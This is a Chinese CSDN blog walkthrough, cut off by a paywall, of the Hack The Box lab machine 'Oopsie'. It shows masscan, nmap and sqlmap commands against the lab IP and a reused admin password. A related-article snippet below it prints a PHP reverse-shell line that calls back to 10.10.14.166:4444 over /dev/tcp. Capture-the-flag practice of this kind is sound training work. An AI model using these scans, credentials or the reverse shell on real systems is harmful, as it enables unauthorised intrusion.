HTB靶机之Oopsie

最新推荐文章于 2024-05-22 16:54:05 发布
最新推荐文章于 2024-05-22 16:54:05 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: HTB 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46412682/article/details/108345534
版权

HTB靶机之Oopsie

1、VPN connection

在这里插入图片描述

2、信息收集

①masscan端口扫描

sudo masscan -p1-65535,U:1-65535 --rate 1000 -e tun0 10.10.10.28

在这里插入图片描述

②nmap扫描端口对应的服务

nmap -sC -sV 10.10.10.28

在这里插入图片描述

开放了22端口和80端口

操作系统是:linux

3、访问80端口

在这里插入图片描述

没有什么可以点或者打开的地方,拉到最下面,有一条提示信息Please login to get access to the service.,说明有可以登录的地方
在这里插入图片描述

4、dirbuster扫描目录

在这里插入图片描述

或者用burpsuit抓包,抓包后forward,在Target中可以看到登录的路径

在这里插入图片描述

5、爆破账号密码

在这里插入图片描述

看到登录页面自然想到的是暴力破解,但是starting point靶机之间是有关联的,这个靶机是上一个靶机ARCHETYPE使用过的密码,这里是

username:admin

password:MEGACORP_4dm1n!!
在这里插入图片描述

6、漏洞挖掘

①sqlmap扫描

在这里插入图片描述

点击account页面,发现url疑似存在sql注入,用sqlmap扫描,level 3也没有找到sql注入

sqlmap -u "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1" --level 3

在这里插入图片描述

抓包保存为1.txt,继续用sqlmap 扫描

sqlmap -r 1.txt

在这里插入图片描述

也没有注入点

但是修改url上的id值时,页面也会发生变化

②找上传点

点击uploads页面,有提示需要super admin才可以操作

最低0.47元/天 解锁文章
0d@y
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[渗透测试]HTB-Oopsie
weixin_47224111的博客
11-15 1257
0x01 信息收集 nmap扫描 发现80端口 和22端口
HTB_Start Point_Tier2——Oopsie
m0_46607055的博客
08-22 1498
HTB_Start Point_Tier2——Oopsie 反弹shell+suid提权
masscan一键扫描整个互联网的端口(KALI工具系列五)
最新发布
LNN0212的博客
05-22 1632
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。这是一个互联网规模的端口扫描器。它可以在 5 分钟内,每秒传输1000 万个数据包,来自一台机器。它的用法(参数、输出)类似于 nmap,是著名的端口扫描器。
[渗透测试]HTB靶机-Oopsie
Y4tacker的博客
07-22 618
文章目录Oopsie Oopsie 首先跳过nmap扫描的过程,现在我们直接开始日,发现了 http://10.10.10.28/cdn-cgi/login/admin.php 用admin和MEGACORP_4dm1n!! 这里存在一个水平越权的漏洞,具体不给出分析了,看cookie都懂 垂直越权后发现存在文件上传点 这里来反弹一个shell <?php exec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.166/4444 0&lt
HTB_Oopsie之SUID提权
网络安全学习
08-29 1049
有些地方把握不准 基础不牢
HTB Hack The Box -- Oopsie
Gh0st_1n_The_Shell的博客
09-10 184
开放了22ssh,80端口,其中ssh有弱口令爆破端口 先打开网页,然后进行目录爆破,在这期间先看一下网页的大概信息 没爆到什么有用的东西,但是有uploads文件夹说明是不是说明有文件上传?
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
htb
03-11
相关项目。
HTB单线策略测试
08-18
在网络安全和信息技术领域,HTB(Hierarchical Token Bucket,分层令牌桶)是一种流量整形算法,常用于网络设备如路由器和交换机中,用于管理和控制网络数据流的传输速率,确保网络服务的质量和稳定性。本话题我们将...
ROS PCQ HTB.rar
10-23
PCQ HTB(Priority Class Queue with Hierarchical Token Bucket)是ROS中的一个网络流量控制策略,它用于管理和优化机器人通信中的数据传输。在ROS系统中,HTB是一种重要的队列管理方法,用于实现带宽的精细化分配...
ros脚本HTB+PCQ
01-05
在本文中,我们将探讨“ROS脚本HTB+PCQ”这一主题,这是一种利用ROS系统的工具来实现网络流量限速的高级技术,特别适用于优化网页游戏体验和在线视频观看。 **HTB(Hierarchical Token Bucket)限速** HTB是Linux...
# HTB-Tier2- Oopsie
32bin的博客
11-16 826
TagsPHPWebApacheOPENCONNECTONLINETask 1****yproxyTask 2//****nTask 3*****ecookieTask 4****234322Task 5/******s/uploadsTask 6**.**pdb.phpTask 7***dfindTask 8***trootTask 9Task 10cat尝试user=2233;
Masscan使用教程.
qq_59923059的博客
05-21 1万+
Masscan是什么以及使用方法
masscan的常用命令记录
记录学习,一起进步
02-09 2556
masscan的常用命令
masscan详解
热门推荐
nex1less的博客
08-24 3万+
一、masscan简单用法 0x00 常用参数 示例: masscan --ports 1-10000 192.168.26.131 --adapter-ip 192.168.26.1 --adapter-ip 指定发包的ip地址 --adapter-port 指定发包源端口 --adapter-mac 指定发包的源MAC地址 --router-mac 指定网关MAC地址 --exclude IP地址范围黑名单,防止masscan扫描 --excludefile 指定IP地..
Masscan:Windows 用户编译和使用指南
lwwzyy
08-11 2315
MASSCAN:海量 IP 端口扫描器,Windows 用户编译和使用指南
信息收集模块(四)masscan介绍和使用教程
xzw123224的博客
03-13 1604
masscan是号称最快的互联网的端口扫描工具,最快几分钟就可以扫描完毕但是他和nmap比较内饰 但是masscan更加灵活,它允许自定义任意的地址范和端口范围。
【信息收集】端口扫描masscan&负载均衡识别lbd
04-25 746
【信息收集】端口扫描masscan工具kali系统自带,和nmap使用区别说明,了解负载均衡和识别lbd工具使用。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值